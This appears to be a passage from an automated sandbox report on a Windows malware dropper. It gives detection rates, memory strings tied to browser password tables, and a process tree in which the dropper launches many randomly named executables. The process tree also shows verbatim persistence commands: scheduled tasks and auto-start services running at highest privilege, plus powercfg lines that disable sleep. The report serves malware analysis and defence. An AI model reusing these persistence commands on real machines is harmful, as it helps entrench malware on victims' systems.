Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378404889.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2376894246.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2402256117.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2404583587.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2393772444.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2396510067.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2401953878.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397894755.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2377471770.0000000005E6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000017.00000002.3208144396.000000001BD38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: WlCIinu0yp.exe	ReversingLabs: Detection: 57%
Source: WlCIinu0yp.exe	Virustotal: Detection: 66%

Source: hvkESMr10WtP7_E6btIJmDx0.exe

String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address

Source: unknown	Process created: C:\Users\user\Desktop\WlCIinu0yp.exe "C:\Users\user\Desktop\WlCIinu0yp.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Process created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp "C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp" /SL5="$402F6,4891798,54272,C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe"
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe .\Install.exe /vHllWdidbTpr "525403" /S
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe C:\Users\user\Documents\SimpleAdobe\cX55WveNgznoE8Y_EKeykvl8.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe C:\Users\user\Documents\SimpleAdobe\njeL_S54LMD1B6b6sdXBUgG6.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe C:\Users\user\Documents\SimpleAdobe\0kNDw1qtthM70owdcV01L1ro.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process created: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Process created: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp "C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp" /SL5="$402F6,4891798,54272,C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe"
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process created: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe "C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe .\Install.exe /vHllWdidbTpr "525403" /S
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: gpedit.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dssec.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dsuiext.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Section loaded: userenv.dll	Jump to behavior
